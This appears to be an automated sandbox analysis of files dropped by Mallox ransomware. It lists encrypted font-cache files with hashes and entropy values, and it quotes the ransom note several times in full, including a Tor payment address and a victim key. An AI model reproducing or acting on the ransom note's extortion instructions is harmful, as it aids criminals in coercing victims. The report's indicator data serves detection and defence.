                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):503066
                    Entropy (8bit):7.999633538649736
                    Encrypted:true
                    SSDEEP:12288:guzVtE049Njcz+FbAiqP5xkM3Evv5kvxE5HWYLYcEQ/IGcLncgK:g2IcE8iqR8vv5TMYs1q4K
                    MD5:E429B753B94A3EFBE3BAA85CA61D3261
                    SHA1:B702196519AB235DFB10495D2A9C21E963BF674E
                    SHA-256:FC9CF18138B7693E6716A0D2F7463705CA5AFCCDE907D0282AD5A52612201ECE
                    SHA-512:DB31DDA68EB6428DC46B9799D44C2A78599C9D94E50B5BA0C4BFA52F29670E6A79E7AB658C043DBEAAE2B4CBF99C9775F37E3F27DCB8FFEB68E0D2DF7464D6C1
                    Malicious:true
                    Preview:.y...t=.(.....Uyg......w.. .h_I7....C....L...QV6.=...z.~..r.x...!....%.lf...{..;....^.Q............... ....,6...H.{.g.g>YO..0&.3gn\...c.8...1Uq.*.>i..P......MPO.f:bF.#y502.H..T.R...n.a..M..!vTv.....\..~La.->^.#n...Q.../..G4..g...he.f.C....o.#z|=x.....\.wJ.....+B....B.3(..>F.2...p...^.o..K..S.a...8...a......S.1.E.O._..*..x.u.).0..5.6...........E..w..l..`.mnq.'#..P...[.CnV>.el..7..y...M.....{..u.8.k.r....'.7...ZA.F.....k.......g...Z#...B.Wf.P...p..kiK$.vrI[...$.. =....(.....)g.Le...^t.R...S......T..\U.v\.^..J.k...l!%.n...G..j&\........A.u~&D.u..3k.-...h.....A..O..t...-...hr/.............FK.$.cV...k.&..%|..n.Z.Y..O+...........uK..Vid^....E.U....D._.......C.?kD...7V.E...w..........u2.l.[..].B.==.?..tC...Q^g..)..!..-.=.g.O.3V...n...Y...Z..<.(..........p.....<.w..)[.\.]....}`er.*F...........V..(..YI..i.(.F...8<U2.\..8.Q....8.|r.%.e/2$.v...O..S..=%p.z.....=.S...5..)ZO...>w.$pD4......m......*`#..(..C...Gn...t.AH.'.2v.o..V.............U.Z....7.B[+.7.

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):238028
                    Entropy (8bit):7.9991304438394115
                    Encrypted:true
                    SSDEEP:6144:h3QJ83alW77n4BNouykBDr4uTAeB1RIkpSsQryhM:ZQJQF7ULHVr4uTAeB1R5pSHryy
                    MD5:D0C3C931EBCEBA797C515B254C5FAF58
                    SHA1:629D25A846B9ABFC1114710B0D9EBF36744A8149
                    SHA-256:B08EA0825CDF3F603ACFF01091C1347D7804442F3D90F3A8E320839A6571DD01
                    SHA-512:8946C4396E57CC18228EBD9B24D3977A1034B788CC9A6C9F245F11B0AFA47C6C6343AE6819F4484456F7CAFB0DDCFDBB9910A285689A0D50370FB89F26B661A0
                    Malicious:true
                    Preview:..:.^gB.......h.....-....w.....z...J.l=..4O...?.}..Jd=.*...9..^H.....7........!LR.P..:..;V.....3...[S..*v...s...0...R...K~].?..#.!.......:I!..6..J..?.....*_.=.`..8..t}..R.. ..WV....M.<..n.e...K..r..J..F.s.9J.&y.j.,m...o...x..Q;Jb3.;~....b....5.q+.)$~...OMq.7.f`LB...2..k..P....C4M.h..M]..?..(..@..]:di...\...<...;..?..Y..&1*....(...t.. ....v+...B...._....`D..].j...Y..U.e^...+.".....z....v...N.#..i....\.!\?f0I..CXQ.l.9.....t..9^..k.G............S>`.,.G%_q.K"..l...........l..........l$.>.X....R.nY.U...#..H...q.+$.5..'.>.@...l...Z......h.h..Q...... ....-.+.6.y...d>.p4-....D....]..;..2....r.....*..W....K.......{.G.F..U./..D......;........zb.q..# K..\......m.=....d......%.>.O.d..'99.].....vbj']%.....~pQw....w....G..[6f.+..|.WX.R.2..y..mz.'..-<........t..0..{Y...k.<...:..7em..SN.........g..z.\Snx&........A{>.."a...w..L.....%V.L....>@..J.&.Y.,.E.R[.X....yU...+3.n.(......|.u...f....bIA`Ca.h.....D[d.$...2YL.;.Y #K......s...r3...G

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):240656
                    Entropy (8bit):7.999224754658942
                    Encrypted:true
                    SSDEEP:6144:UMjwxBgOaNeCgnGtlDylVPpSPFk3Glg2AL:DjwxBHainqh4VKKGlnG
                    MD5:D5D1EA81831990C349E047F8F4045C7C
                    SHA1:051A8E1AE63E3F522B368FABD1E619686512D72F
                    SHA-256:FFCFA9623A16ACFCC9003AB1E6C8A24FB098F42DAC86686C78F64563D4E5CEA1
                    SHA-512:0C7030C4F3AA13DF9E2E6883AFD63A8ED5197C48B3BF594F5E2659EFC13E30B06F697232A17BFA191AD7D1B3862581F10A090F6AFF59C5604F4C6ADBCFA11B6A
                    Malicious:true
                    Preview:|usr.~#....B^s.....'..}.X...REB<..:Cv..G]L......qy.R.l..;.....M..^.<....".Q..G8h8n^....}(...~%.Q..1O2....1v.$.*....-j...i..<.P#.9....=....F5*...2:..}.U......l|..;.../.%4.W.h.............q..fK.=`..V..R..B...j.B....v.H...J1.."....k.M...+#.K.j.]K. .!..Dk....08#..z04}=[..H...ud...$z.L......'...U.@ 5t....gW..M).....m.V/..a.F....-.(.#..._.]f...=..;.^..t0%!1.........,."...4 @*0..o9...........;.VtY.....qe.s)..7....A.R.d.Q......b.....{.....BN.iy[ .wU.j.kT...\3...F....3..j....n ...+..n... ......:..8.s.G...lYo....$..D.Q<...A...~..j\.y].e...4..t..$.qF.R)...j..&.jC.J.y...wt..[.......;....(....Tp.!).PG.@.....F+f.{.s.7d.f...........Vwv.h..q./...|.....#..D....V..K.>~[!..:.K....E.(fR......\.....c.5..U...J..{E..h9.._Hf.|.:...e<.^.."..lF.q....'.....C.u.Lo|.7QN.."...A..@.n.J..*`|.\s5..f.q.U.. .?:1.RU).7.Z..?H.c.P...N....Jr>Y......<wz..%>.t.,.....]xW.Z%.O8..9...3......l..K+4K..x.N...*.j.gH.....\O......iG.........\........^..xb.'w\../]\U....t...G..tT.@.9...

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):241524
                    Entropy (8bit):7.9992451256817985
                    Encrypted:true
                    SSDEEP:6144:mX55e5tigmoCyo8ewfD0RCl80JEMRnsz8U2Wju0Kfpsy:mJo+fvySU0RC7JEIszGHpsy
                    MD5:43E4F46A9B61C011E99E45AE96DB5DEF
                    SHA1:B51A3199F99EF8CFD78D66E39A8D4D2AF3BC7175
                    SHA-256:7B429719490D1DA8D1D69F9F68B8A9D1BA18A80255A1DF352F2A1322642ED38F
                    SHA-512:4A18990625DB6B3E3ADF58188FEF0BAE845E061D15BFFDC94202E3261DC77F9CA9C3D77708FA3933EF2452634B97438B92DAE6D384F9304118D4265D554CEDF1
                    Malicious:true
                    Preview:....v.t}5.n...4...O@;.....u..2..+.en.....;7N...Q.!P5o..gI..p....S.m.{.<o.Ef..].T!q.'.V......<.P..1k.:i.........Soe=b.w...`=.T..<.x.@...9qo7.P.v..Y<..A.y....<T+oKb$..0Qo..<Ri>........!...X/....y.V'..u..3R..).k&...z...R...-......H*.9......+[......4..... ....).`-..!.A@A. $4H..~?+/3.`.g........}......ZF..L......h....jU....Ei.`EW..D6........5...n..<U.[..a.nf7.'G.p+.'t.prs..4.l.l.......&O....K.......N;..A.ibZh...-..x.../...j..(.j+.;=\;.......:.9DY.!n.ms..]..V.o..l._.Y$.....t"..M..k...l.a..Ap+d$....a.n,.t..g..X>}.ZM_M........-.B9d..v4..?.1K..V....#7.b.-.....L}..(..P..9...%..1.'...p.}8....W2e....."...O...........)...]$..1...t!v.."!00M|ISO.Pc.S2.M.D....4.m..(._..J.9....iE..*....S..G.......jw. .%.....G.....L.=.......g.*. R.5JzU.N.o..n.%.!....@6..C..U..q.OL......(.X..e.J.".{..6Y../..V.s.2$...-.C....h.b./....i.&x.4i..@.k.+E.G..@!.."..t.Z...5.j&.....#N..z..q.P9K..kQ......F.TP|Q..Y.5W?m.....S..1.....bo..w.I2V..eV.n.[..`.b.7J..|.c.....O..7.+h........M

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):238736
                    Entropy (8bit):7.999238896257288
                    Encrypted:true
                    SSDEEP:6144:IhhnoBsrcxAIPOme7rh/fNJUb55DBODp0o5:IhhnoScxBWL757Ut5Ds10K
                    MD5:60597DF00338FF207DA58845BF979DBA
                    SHA1:089F7CBE7DF152D474175BF2AEF6582D86BC113D
                    SHA-256:75C83C425A6B839BA0873F8B03A2264FCC3B2D68442C8EDA1EBCF60B6F23C100
                    SHA-512:42F4C6184DFCD704D2E554D1FF4B6B1D7AAB5D7181C45F0B34EC462AF2409F35A9D454D08BB82BE048239BB06753C224D236B483CB43892566BE439FD115E574
                    Malicious:true
                    Preview:.X.I.U..|.C/C.2.......vS........T....o......}..TV...A....d...^.Lv..k.j..'R&..!F...\S.:...... @s.&.imd......i.}..SH.rd)..7L.\c4....K.Oq.@.h..F.!..#..j.s....3>m.ZV.w..B.Fw.9)...?.2...=S.B.#7..D.'Y........C.].w....C..6.......Tp..v..7..........q...<.....w...~..(<.K.e..-....^.@..a."/.Yz,-8{..*P.W....R..X....G....6...;.-........yr.Ag..{/.`So.W..2.6.?u.2..V..M.).(.....5.W...1R....p<.a.Z.......i..T:.ZQ8...t..j.=.t.|...`$....5n..h.l.....t..1"..__....3.n..../....Z2.VJI.......o..|...m.0.S........F.D7../.s.<. .%...j..*L.......O.....R.Z.a.=.1.W.?....~....K&E.....&.....(.9..u.W.X.....8n...D....*.......95w.y..b.G.pl..,..!...f.z......F>.w.I.y..>D{....Ma*E]..L?L.9..>hS.~._N....t`M:.7..f..C..........)..c...zl?_e..z..=]..G%..AR6t.1s..=..6..%1d.g.[m.....E....I..gw....!.>.fj.....C....H....fo.o....!.X.y..X@"..F.=..o.0..v.....*..U]....../G.!.N....U.......Q..1..8....1...`.G..=}%..8..1Q..+;..hb.....n.a.Z.E.....L....gj.S...~....G..v..)z.?..F..LG.7....Q...>...&...

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):237676
                    Entropy (8bit):7.999326451971584
                    Encrypted:true
                    SSDEEP:6144:UIfxV/5CvlOAF5hw3YRodETmrC+wWA6DO2JhgC2xFVAH02k:UIfxV/58lDJEYR0E+8W97J6C2xFiH0v
                    MD5:D95D88591E7E6DFCE944B3B03A8BF8EB
                    SHA1:47DFA340313610DC3088A206667BE97D53C15C45
                    SHA-256:1590A4EB23E5D8C9D28CA3F4177C0D33B48D7A191B68BF8ABCF3CA04FF0DE385
                    SHA-512:18614F076787DA993C9C213CBEC4D89EB3806F4CC64E9BCF44995812E97FC910991BCECB2A2F1698A2115B7B643771A8A593771567C358E2BAF96DF3D8E1B063
                    Malicious:true
                    Preview:.-..4....FzF`...&ee....#?...s.....zP.!V......A...6...t. i+.s.cm4`.IB1.w....^..qd.n$0..~T.s.AH@>..V.]....c...$...<P4tShJW.}...z.. ....&..!...:%.k......V........R.H....~.....^x.;.l<......A..T..<:....I{2r...0:.....D2}.K.j..$..Q..>..C3.n...Y.=^....~..C.X.?..O_..A.A .\.....Q...yu..>.c.....&...w..\z..D.|.....|.I.Ev..R.m...j.l..oHc.....FTa..j...@]...6fK....&......5y.1..e.:4...s.K.........,..\.....x.Q>.....;Zv....n..%E..j..e.._..7J..,[.'pg$..4...'...e x.."...).......#V..........#...I.....&...... F.Q.=}s..cA..q....v.a.........u.]...&~.u.w....yl../..WS...|Hr...n..0;H.<N[Xk.N........>.jEpMb............$l$r..%.~s!.A......c....$<.T`.8H.(.......J.>#As.h...0.#...N.=..vafP..@..5d.l.Ns..8pX..4..H.76]..J.&.i."...%.A..Y.....|.p.Z&i}}.z+.D..:..X.J0z0e.&G.N'&Y.f..SW@?.;c.GoEH..{T;......D.YA..;..&Q../Y@.Gz......Z.....C..g...L........).D....Q.4(. .....B..Q....^@o.V.E.L...0....w..X..2......j\m..#.Z.<._...._hJ..d]..D$4......[_..9..N..G..Ve.U.....b..{..._

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):241152
                    Entropy (8bit):7.999362155408254
                    Encrypted:true
                    SSDEEP:6144:A++i/ShreXkivQVuLzF3Da0rXDywG7Lr+btL:r5S8UyXxDa0na7Lr6tL
                    MD5:B3EBAFD3913C799C595061938F194E99
                    SHA1:F2187704BA94B5FC89C38D86DF5FF14B6EBC0ADF
                    SHA-256:AA51E777DB340FBC327781AC4D5CB0798EA70EDEA180BEBF27794B136CD50020
                    SHA-512:1A20260F97BF74C7DE897C56AABBF5A9973811685C2B7BC6300AC7F8F562E5A6C567F30815E5E1FBF7E2D00B50B740DA5749F3D858D0E2269C3C2A84AFC1141B
                    Malicious:true
                    Preview:8.(h....Ja!r7h^.;.sHO.s.....B.....W.U..!.}WA!.......7.BU.M.'...>..Y......Y.f.O.U..`.`.Y.Yo.R5Vm[....gzw;}..Gt....A......p.f...o....]F..s.Q...7....qp.m.-.^....OG.i.t.^..7....#.f.DQW.g....t..#.KQ{E....E.9Y.U..........0p.B... ..:..c..'d..r..`.-.....-..&Br.W7=..4.r....L.(.Y.r...w....++5.8u.`.Ja......{....b.62...}...i....03...?.!3...k...9.4>."h<*.>..f;...hC.d.~<c....[.-X..V.,....qL.U..j10>a.%..9..Q...*.P.y......7^X.....&.P%.Q.S.~n...,P..m...t.Yuhe...._...>.js.....)_.......Wx.)V..... .$m..q...c.">b.`A*....f..x...q.:.L?....J.FS..}s.T.....~.=.....N...f..$..E.>....<0.^..0m.m5.G.a.......$..OH..SQ.$.). k..-.#.a..^.J.....CY.|$.34fl5gh..?4...c.Dh|.aE...4.M.B.#.~R....O3...V#/..W7...de`...J....;DB....8.T..p.Duw.6VK....x.m..jNEi...d.m..s......Y...|....R......M..8.'1.....i...3zQv..C.... O....1...bU.m*.xK@.L..d.#".4.o}......J.........\V..mX.j..u....J.|.k.c`oU.....z...CG...A..B..$.;.{ab..6........Yw..j.<!.|?B.|4.z.0..Ww.'.{.....e..v...2.=..jf..Q...j...1.F.6.

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):237512
                    Entropy (8bit):7.999158778911604
                    Encrypted:true
                    SSDEEP:6144:TCi5wUPet8CWR4x7NkZNIJ0J27ccnmjufdl+ENZVVQA:TCswUPetPWW9NkZNIHc81Bt
                    MD5:6F3061D7BFF31772EB68512135A48C9A
                    SHA1:F8419240A423D0D73A8AD2837D4C36F2BA58D0AC
                    SHA-256:3C46900DF9FA695F8E146C2FBD1B42729D5D8D6DE766C1DF6D3993F725AFC451
                    SHA-512:F4499CF7D1097FF62146DF94876376746B67FF4F6175E6EE27291C59C6AE50F086D9F4C9C066F6F9A5114F4918896778AD1AF9479D774E319BBAC12CCF33E0F8
                    Malicious:true
                    Preview:....f.C....ZM...l..5.9..9..\.A.*?O....4.........qeY..A9.L..b..9..]P..2q..+....)...i!...............6q...k]...(.Q..2.M..A...Q^.Uij.....aT...`@Y-..!S..s.G...p.G....-....v.9.j...I...|.#...6..U.w..q..w.L.V@....>.....Le.Y.......}m.........j{.%........Tg.w..Ow/.QKT'DG.......Dp...*.Uh.k..=.."....^T_.....7QQy!_.x)6h#.=.....woM..Rks..y.+/..^./.5.Y..b|../X..G.....86...tk...3.d.{W@...G.dW6...h..o3..[.L.X.;......~.....[VF.LR......=......... ..,-.&..w.h...a.<..Wl.:...@.'p.TW....d..D.t. (h.Ux........koN.&.}.K.P.P..My1.k.'J .K........A.F..e.H/.........p..e#Y8j...l..56..J.u.Z.k.....oj...m...Z.-q6k.z.........X....G...=.v.E.Z.s-.....X.D~\.f.T...~..*.hu............6.e^...e...* c9S#%fn....m....6i.`...`G.A.(..]Z.&.r")..B.A.....uN..rk..T]U..#[.4...f/u)K..<...T....n0k.I.[.C..r".@..../i.d........f.H#'\FK{7uM(`..D.m8.-..+..>.e=.......S........=.8Y..e....'..;y. ...r..X....{O.de.`....Z|a..h..%KD)3...rk.rU.+4..|.>...Y...s.cu.y.P*\%.Fj.....(........@,..M\.:.y.%...>

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):240480
                    Entropy (8bit):7.999199978135356
                    Encrypted:true
                    SSDEEP:6144:yWP1T/DMU33w+DwzAk0WA8gA5b3j1RJG6Q6KTCBYTJM9JT:7P10iDwzA5A5Tj06dYTq7
                    MD5:DE53CCD51C68BB066FAC2F669B91F480
                    SHA1:20F2DD123AB3BFC1951426B6879FCB6486790E14
                    SHA-256:5A0E91BF0091FF5163A2E1B7141AE1B6E4C26FA305FD3D6C85703FC46ED4F862
                    SHA-512:62F77B2440BBCF6886474567F31D25E94044DC4C3AF75F1370C197E3B5F7C20BEE86B99F76633152BBCD0AF7D97A73D7F20379DBA4160537971D9D94032266AD
                    Malicious:true
                    Preview:]&7.........@qj[....5L..~.l.".6....#..xP...-.T.......X}../g..A.X96.9y...gu.. .....q.36X...3.;2...s.)....#<....}f}j../$.Ap..vzO..(]...<.K.n.....S........O...R....$.b%..t.."#...M....=6.${`...G.qd.Ms]...5..+........?.d...R..:#X.5...cKk.&f.dy.F.D.6.....[.\iO.+......'...'J..Ixa.%=..{&....V.....w.eUKT...u,.'.t.v.i......U..hy....b.uC*`.....a.q.....to...\Z...}.....l...rp....zT.6..NX..+.[....3.wN.b.......tL.n2...8wA..Y........He..\..Vt-.hf.Q.^D..: .5%..D..l^.{.va...,...4..J9.....`AH@."E5VI4..}.f.h....B...v..\...=....R&69$!......F1..yAe.&Z...:..X.....=.4...gK.%.[\.._..V?.....b..o..X`.Z..:...H.Zkl.$^..$.b...gP7q~p.3a_H.O.; ...|\....=)..r.h.....I..3Ec..J.{...O./.]rC..>..h..l....:.L....Wc..;v.Nl7.heR$....3.+.?.Wo...<..O.2..3..2...>... .7'._...%.$....}`AWe..h#.p.V ...s.g./.B0....;..'..0h.U9#L......e.m.^dd..... .....[?W.3.S.2x....`...F...L.$.}.,.9D..8....a...r..'U.R.r.0.T.~Ws...a......."..Fj2F..`v..w.....yx."..N.sg.+.096....3.qD....'....<....?D.kO7.

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\27160079615.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):238292
                    Entropy (8bit):7.999216541998309
                    Encrypted:true
                    SSDEEP:6144:mXrNdSL8LF3bnv0hdYiZauQe/cbP8T7vqFewyBXB:mbNdS4BnvqdzZ/6sQeHXB
                    MD5:85D94B63008C22A2B3DB546FF610A14E
                    SHA1:467C1A030A26CC064359CE0A12343C4E52CE06A6
                    SHA-256:BF51662BB7F9E8279A7EFA49B73D26A974530D73A5554838D962F78B43A58AA9
                    SHA-512:07D1833307ED14054A8B640189215AD968E9C75E2015D00E40318E1CF797137DF8C9DB61FD78F10548F3F50226B4E6AC9ED0B264688B1E8C0834CBB2E289FCFB
                    Malicious:true
                    Preview:..h...5(..qx!..6..}!...NAh.0."g......a.x....S...t.t\...g@n4..bkN..R.;.z......a.Lz....\)e..M..D&.8.w.#...7...?...epc..(Z.....}(..jZ.7..m.....;........aw..aa.K..JS....,C[#........t...M...{0..k.0..Or..Ty9...n..0s.z'BL..Q...d.]U.^."...|5.p-P.+O../....b.h.{.?.5...8r5.....oa.....+p.. .n..#...d....#Z...u...8&.,.......5n.....&..w..}f.=.I@..-W..3u....!....tcH`XW.S/...`*).m.;...Y@n+u...5%Y..-...a.q.x....`Z.S.'{%RN.Gn....,y.d.v.k.1.\.*....%.s6..Q.._ '.t-..X(...&.r.dK.,='.=....Bo...WL0T;G........UD."5...h...V....9.|.(..)_3X.^.(X y.2W..PXs.z;.....'\..3....!.= 2.G...-j..m.]TW2|..[!+.^h".6.@R."!(..!..u^}s.7.-.....,?P.....@.J/.....$...0.7.%v...&.H.....#.....&...l..UsI..rCq.2..6m#.SE.}.>.......A/(.....&...p.....Y..Ad.....wZ..N.h..$.#e...-.98..O.,L......{...ks..K...-;..H.q]..5;".b.~.N..U.dQ...].N"&..Bh....!`yq.. Z*.c..o.B.1..,._..$..D..5g.cu..m.....*.$......v>..N.....R*...."......2^m..v..7.......QS.W...S....JhF]......^.9.{p.....B.......V..G..c'

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\28315153308.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):241056
                    Entropy (8bit):7.999239679662125
                    Encrypted:true
                    SSDEEP:6144:wEzUrgHFBPGqJRetzXl9BYb1sJL2ZZ3lh:rzUwFBP3eZl3Yb182ZZ/
                    MD5:4911085FBA3319DD3B0C32E490CAEDD6
                    SHA1:56891476F0B883E0C4B90F72842561332EF197BE
                    SHA-256:163B3FB040778B99544A5B64CC9E58E840B0CB99A8E3258498693E5157E2C77A
                    SHA-512:198E22C900AC1656569B5CDB2801C7D780C1F06AF3B0BEFF0F07C4A813B714460C217B3F0E72DA7FF1B80B136B77FD831BDD2C38F3D9EE6D2A012545B5E32CDE
                    Malicious:true
                    Preview:...*..-....|.|.I...~....=...uH.9......A..GX'.1.3..../...A+l../`..U..m..k.bMT.D.Yw&.L........8..0....5...].C..=%.c....Z|N..Z.or6-i....T..p.xQ....).........Y6......i.b< ....H...+`..d.....5.Z..........G.:.|0.J?q...T....q.........R..yZ...Gl.{..B7.rk..C.....vk...X.2>aB.o...e.R..+.qE..`./.1(.J.Ev..!.....U.#...Q..f@....U....>|..u*.[.!OQ.U..ws.zWvi~...E.....=fg.*.U4/.S....4..@.:........\..O.G.U...3.;.yB2C.82.xSL.."4Q.?:kf&r:.b..#...B....(...O...O..V.j...+"........<.8.......v...4.rx...K...O....;...0...F..G.{.S.XL.4...)JJ..]Q..b....8.vJ....^iB.q.@@.....S\........8>V48.6....r.iA~...Q.....1.T.....d..._$*....f-e.....-....Y.n?.).5....}.+...=..-.pS.>.s,j..|.A.}.7...w..B..:f6......El.....K...>....#......6.....j.5.2..-'q..:../E..T..........z..U.....dZ......0..J.`..9?...T......YX.7..`.dK...V..p..<.,..3...e..@.7....2./-.I!....(.B9=X..R..o.N....a.-...{.....s..K...%.SWY..1g.[.^N...c.|...^.@.....]......3...H%.O.,J.-..z.....9.%.NZ..9.Z....17...MS..3U..

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\29939506207.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):237720
                    Entropy (8bit):7.999248880348446
                    Encrypted:true
                    SSDEEP:6144:vMqxK9EcpzWw/EgxguqC3S6Swv2bwbfTv:lMFzj/EgxxMT0bT
                    MD5:6BEBBB9DA4C2E9DDD5B272B2D097DC5E
                    SHA1:F1C1675C74C5A9BC513C4E04E720FEE8DBECF6C8
                    SHA-256:DEF8F01629BE75BB93F90311AD10C51A749C67A4F0AE36C6A56DC313C7791E45
                    SHA-512:6A0D3D984591BCE58EB229DE898CB7C5E2E84E171938556C9742D34DF0C498147B4007EC44B19D1E2FC47F1D3500C8BE5F2CA79A1B4B453E46B012FAAA711F19
                    Malicious:true
                    Preview:1f...X.~.....@......GE~.G....0m.$.w......q..3Q../.KT.#.7..S......{......Tx.i.....(i./_...l_G....X....jB5..:.6...cv..i.......a'..1q...../.!?..E..c..-.!..C....P.-.[$...x.^.{?/.$..F.T....7....S...x#.*..0b.yD...N.\_+}...i...N..%.........'..D[9v..o&W.@.....i.6!.2....U....X.Y....i.L.t..z..0i==.l....v.-...9N...J.X...q6.(.M...:..a?...x..x{..e.G....nN..)y. ...P.h..zviu.W.i.}.ka...............-.wa9L..G.G.Y.^..Ck.O...I..Ti..x...!.LZi..p.g\...(C.u>Y..c...M..<...uw.F..S.Wo.BPl.]..8$u7....V.}q)..Hr........OR...|....r.3.F..qC..Q.....fT..\..................5o?..;.).....8.....pBr..i..S}}.=...aF./Y......(<L.Q..p...`.N.:r..Y].*K&M..#...td...Qy.j .#..e.w.Q.1..t\Q(..6.;.6F7)T8...B..D...P......5..:cA..TD08........`.I...k...L{.......f....)[.:m.Q.nH...G.....P.).#.....@.Bs.i....?.Q#.....Mg..t.pH.Dg.fSL.rc..yovj.k.I.).`k....R...v.R.h..y..e....+..x......}.&.4^l_.4..O..o.G.q..W\.@....=#..+..O2.=*...l....k....[...g/.8_.....~.m......w..g..QG......k...R.W.=.

